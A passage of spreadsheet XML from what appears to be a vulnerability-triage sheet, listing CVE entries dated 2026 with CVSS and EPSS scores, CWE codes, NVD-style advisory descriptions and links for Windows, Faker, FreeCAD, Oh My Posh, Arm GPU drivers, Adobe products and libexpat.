          <t>CVE-2026-72996</t>
        </is>
      </c>
      <c r="C2249" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2249" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2249" s="5" t="inlineStr"/>
      <c r="F2249" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2249" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2249" s="5" t="inlineStr"/>
      <c r="I2249" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2249" s="5" t="inlineStr"/>
      <c r="K2249" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2249" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2249" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72996</t>
        </is>
      </c>
    </row>
    <row r="2250">
      <c r="A2250" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72997</t>
        </is>
      </c>
      <c r="C2250" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2250" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2250" s="5" t="inlineStr"/>
      <c r="F2250" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2250" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2250" s="5" t="inlineStr"/>
      <c r="I2250" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2250" s="5" t="inlineStr"/>
      <c r="K2250" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2250" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72997</t>
        </is>
      </c>
    </row>
    <row r="2251">
      <c r="A2251" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73000</t>
        </is>
      </c>
      <c r="C2251" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2251" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2251" s="5" t="inlineStr"/>
      <c r="F2251" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2251" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2251" s="5" t="inlineStr"/>
      <c r="I2251" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2251" s="5" t="inlineStr"/>
      <c r="K2251" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2251" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73000</t>
        </is>
      </c>
    </row>
    <row r="2252">
      <c r="A2252" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73001</t>
        </is>
      </c>
      <c r="C2252" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2252" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2252" s="5" t="inlineStr"/>
      <c r="F2252" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2252" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H225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52" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2252" s="5" t="inlineStr"/>
      <c r="K2252" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2252" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73001</t>
        </is>
      </c>
    </row>
    <row r="2253">
      <c r="A2253" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73002</t>
        </is>
      </c>
      <c r="C2253" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2253" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2253" s="5" t="inlineStr"/>
      <c r="F2253" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2253" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2253" s="5" t="inlineStr"/>
      <c r="I2253" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2253" s="5" t="inlineStr"/>
      <c r="K2253" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2253" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73002</t>
        </is>
      </c>
    </row>
    <row r="2254">
      <c r="A2254" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73007</t>
        </is>
      </c>
      <c r="C2254" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2254" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2254" s="5" t="inlineStr"/>
      <c r="F2254" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2254" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2254" s="5" t="inlineStr"/>
      <c r="I2254" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2254" s="5" t="inlineStr"/>
      <c r="K2254" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2254" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73007</t>
        </is>
      </c>
    </row>
    <row r="2255">
      <c r="A2255" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73011</t>
        </is>
      </c>
      <c r="C2255" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2255" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2255" s="5" t="inlineStr"/>
      <c r="F2255" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2255" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H225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55" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2255" s="5" t="inlineStr"/>
      <c r="K2255" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2255" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2255" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73011</t>
        </is>
      </c>
    </row>
    <row r="2256">
      <c r="A2256" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2256" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73014</t>
        </is>
      </c>
      <c r="C2256" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2256" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2256" s="5" t="inlineStr"/>
      <c r="F2256" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2256" s="5" t="inlineStr"/>
      <c r="H2256" s="5" t="inlineStr"/>
      <c r="I2256" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2256" s="5" t="inlineStr"/>
      <c r="K2256" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L2256" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Data Sharing Service Client allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2256" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73014</t>
        </is>
      </c>
    </row>
    <row r="2257">
      <c r="A2257" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2257" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73015</t>
        </is>
      </c>
      <c r="C2257" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2257" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2257" s="5" t="inlineStr"/>
      <c r="F2257" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2257" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2257" s="5" t="inlineStr"/>
      <c r="I2257" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2257" s="5" t="inlineStr"/>
      <c r="K2257" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2257" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2257" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73015</t>
        </is>
      </c>
    </row>
    <row r="2258">
      <c r="A2258" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2258" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73020</t>
        </is>
      </c>
      <c r="C2258" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2258" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2258" s="5" t="inlineStr"/>
      <c r="F2258" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2258" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2258" s="5" t="inlineStr"/>
      <c r="I2258" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2258" s="5" t="inlineStr"/>
      <c r="K2258" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2258" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2258" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73020</t>
        </is>
      </c>
    </row>
    <row r="2259">
      <c r="A2259" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2259" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73021</t>
        </is>
      </c>
      <c r="C2259" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2259" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2259" s="5" t="inlineStr"/>
      <c r="F2259" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2259" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H225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59" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2259" s="5" t="inlineStr"/>
      <c r="K2259" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-20</t>
        </is>
      </c>
      <c r="L2259" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2259" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73021</t>
        </is>
      </c>
    </row>
    <row r="2260">
      <c r="A2260" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2260" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73024</t>
        </is>
      </c>
      <c r="C2260" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2260" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2260" s="5" t="inlineStr"/>
      <c r="F2260" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2260" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H2260" s="5" t="inlineStr"/>
      <c r="I2260" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2260" s="5" t="inlineStr"/>
      <c r="K2260" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2260" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Services for NFS ONCRPC XDR Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2260" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73024</t>
        </is>
      </c>
    </row>
    <row r="2261">
      <c r="A2261" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2261" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73026</t>
        </is>
      </c>
      <c r="C2261" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2261" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2261" s="5" t="inlineStr"/>
      <c r="F2261" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2261" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H226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61" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2261" s="5" t="inlineStr"/>
      <c r="K2261" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L2261" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M2261" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73026</t>
        </is>
      </c>
    </row>
    <row r="2262">
      <c r="A2262" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2262" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73231</t>
        </is>
      </c>
      <c r="C2262" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2262" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2262" s="5" t="inlineStr"/>
      <c r="F2262" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2262" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H2262" s="5" t="inlineStr"/>
      <c r="I2262" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2262" s="5" t="inlineStr"/>
      <c r="K2262" s="5" t="inlineStr">
        <is>
          <t>CWE-95</t>
        </is>
      </c>
      <c r="L2262" s="5" t="inlineStr">
        <is>
          <t>Faker generates massive amounts of fake data in the browser and Node.js. Prior to 10.5.0, the faker.helpers.fake method in src/modules/helpers/eval.ts allows attacker-controlled fake templates to access the Function constructor through fakeEval.resolveProperty when a function returns another function, enabling arbitrary JavaScript code execution. This issue is fixed in version 10.5.0.</t>
        </is>
      </c>
      <c r="M2262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73231</t>
        </is>
      </c>
    </row>
    <row r="2263">
      <c r="A2263" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73234</t>
        </is>
      </c>
      <c r="C2263" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2263" s="5" t="inlineStr"/>
      <c r="F2263" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2263" s="5" t="inlineStr"/>
      <c r="H2263" s="5" t="inlineStr"/>
      <c r="I2263" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J2263" s="5" t="inlineStr"/>
      <c r="K2263" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L2263" s="5" t="inlineStr">
        <is>
          <t>FreeCAD is a free and open-source multiplatform 3D parametric modeler. Prior to 1.1.2, PropertyFileIncluded::Restore() in src/App/PropertyFile.cpp concatenates an attacker-controlled file or data attribute from Document.xml with the document transient path without rejecting directory components, absolute paths, or parent traversal. A crafted .FCStd archive with a matching FileIncluded XML attribute and ZIP entry can therefore write attacker-controlled content to arbitrary locations accessible to the FreeCAD user, potentially enabling persistence, credential compromise, configuration replacement, or code execution. This issue is fixed in version 1.1.2.</t>
        </is>
      </c>
      <c r="M2263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73234</t>
        </is>
      </c>
    </row>
    <row r="2264">
      <c r="A2264" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73505</t>
        </is>
      </c>
      <c r="C2264" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2264" s="5" t="inlineStr"/>
      <c r="F2264" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2264" s="5" t="inlineStr"/>
      <c r="H2264" s="5" t="inlineStr"/>
      <c r="I2264" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J2264" s="5" t="inlineStr"/>
      <c r="K2264" s="5" t="inlineStr">
        <is>
          <t>CWE-1336, CWE-94</t>
        </is>
      </c>
      <c r="L2264" s="5" t="inlineStr">
        <is>
          <t>Oh My Posh is the most customisable and low-latency cross platform/shell prompt renderer. Prior to 29.35.1, the setStyle() function in src/segments/path.go passed pt.Path, which includes raw folder names, to template.Render, whose function map exposes cmd, so an attacker-controlled directory name containing a Go template expression could execute arbitrary operating system commands as the current user whenever the prompt rendered inside that directory or a descendant. This issue is fixed in version 29.35.1.</t>
        </is>
      </c>
      <c r="M2264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73505</t>
        </is>
      </c>
    </row>
    <row r="2265">
      <c r="A2265" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7476</t>
        </is>
      </c>
      <c r="C2265" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2265" s="5" t="inlineStr"/>
      <c r="F2265" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2265" s="5" t="inlineStr"/>
      <c r="H2265" s="5" t="inlineStr"/>
      <c r="I2265" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2265" s="5" t="inlineStr"/>
      <c r="K2265" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2265" s="5" t="inlineStr">
        <is>
          <t>Use After Free vulnerability in Arm Ltd Bifrost GPU Kernel Driver, Arm Ltd Valhall GPU Kernel Driver, Arm Ltd Arm 5th Gen GPU Architecture Kernel Driver allows a local non-privileged user process to perform improper GPU memory processing operations to access already freed memory.
This issue affects Bifrost GPU Kernel Driver: from r49p3 through r49p5, r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0; Arm 5th Gen GPU Architecture Kernel Driver: from r49p3 through r49p5, from r51p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2265" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7476</t>
        </is>
      </c>
    </row>
    <row r="2266">
      <c r="A2266" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2266" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-7477</t>
        </is>
      </c>
      <c r="C2266" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2266" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2266" s="5" t="inlineStr"/>
      <c r="F2266" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2266" s="5" t="inlineStr"/>
      <c r="H2266" s="5" t="inlineStr"/>
      <c r="I2266" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2266" s="5" t="inlineStr"/>
      <c r="K2266" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2266"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r44p0 through r49p4, from r50p0 through r51p0, from r54p1 through r54p2; Valhall GPU Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3; Arm 5th Gen GPU Architecture Kernel Driver: from r44p0 through r49p5, from r50p0 through r54p3, r55p0.</t>
        </is>
      </c>
      <c r="M2266" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-7477</t>
        </is>
      </c>
    </row>
    <row r="2267">
      <c r="A2267" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2267" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75631</t>
        </is>
      </c>
      <c r="C2267" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2267" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2267" s="5" t="inlineStr"/>
      <c r="F2267" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2267" s="5" t="inlineStr"/>
      <c r="H2267" s="5" t="inlineStr"/>
      <c r="I2267" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2267" s="5" t="inlineStr"/>
      <c r="K2267" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2267" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2267" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75631</t>
        </is>
      </c>
    </row>
    <row r="2268">
      <c r="A2268" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2268" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75771</t>
        </is>
      </c>
      <c r="C2268" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2268" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2268" s="5" t="inlineStr"/>
      <c r="F2268" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2268" s="5" t="inlineStr"/>
      <c r="H2268" s="5" t="inlineStr"/>
      <c r="I2268" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2268" s="5" t="inlineStr"/>
      <c r="K2268" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2268"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2268" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75771</t>
        </is>
      </c>
    </row>
    <row r="2269">
      <c r="A2269" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2269" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75862</t>
        </is>
      </c>
      <c r="C2269" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2269" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2269" s="5" t="inlineStr"/>
      <c r="F2269" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2269" s="5" t="inlineStr"/>
      <c r="H2269" s="5" t="inlineStr"/>
      <c r="I2269" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2269" s="5" t="inlineStr"/>
      <c r="K2269" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2269"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2269" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75862</t>
        </is>
      </c>
    </row>
    <row r="2270">
      <c r="A2270" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2270" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75863</t>
        </is>
      </c>
      <c r="C2270" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2270" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2270" s="5" t="inlineStr"/>
      <c r="F2270" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2270" s="5" t="inlineStr"/>
      <c r="H2270" s="5" t="inlineStr"/>
      <c r="I2270" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2270" s="5" t="inlineStr"/>
      <c r="K2270" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L2270"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2270" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75863</t>
        </is>
      </c>
    </row>
    <row r="2271">
      <c r="A2271" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2271" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75992</t>
        </is>
      </c>
      <c r="C2271" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2271" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2271" s="5" t="inlineStr"/>
      <c r="F2271" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2271" s="5" t="inlineStr"/>
      <c r="H2271" s="5" t="inlineStr"/>
      <c r="I2271" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2271" s="5" t="inlineStr"/>
      <c r="K2271" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="L2271" s="5" t="inlineStr">
        <is>
          <t>Illustrator is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="M2271" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75992</t>
        </is>
      </c>
    </row>
    <row r="2272">
      <c r="A2272" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2272" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76957</t>
        </is>
      </c>
      <c r="C2272" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="D2272" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2272" s="5" t="inlineStr"/>
      <c r="F2272" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2272" s="5" t="inlineStr"/>
      <c r="H2272" s="5" t="inlineStr">
        <is>
          <t>libexpat_project:libexpat</t>
        </is>
      </c>
      <c r="I2272" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="J2272" s="5" t="inlineStr"/>
      <c r="K2272" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L2272" s="5" t="inlineStr">
        <is>
          <t>libexpat before 2.8.4 lacks handler call depth tracking with custom encoding callbacks. Thus, a use-after-free can occur. NOTE: this is similar to CVE-2026-50219, CVE-2026-56131 and CVE-2026-56412.</t>
        </is>
      </c>
      <c r="M2272" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76957</t>
        </is>
      </c>
    </row>
    <row r="2273">
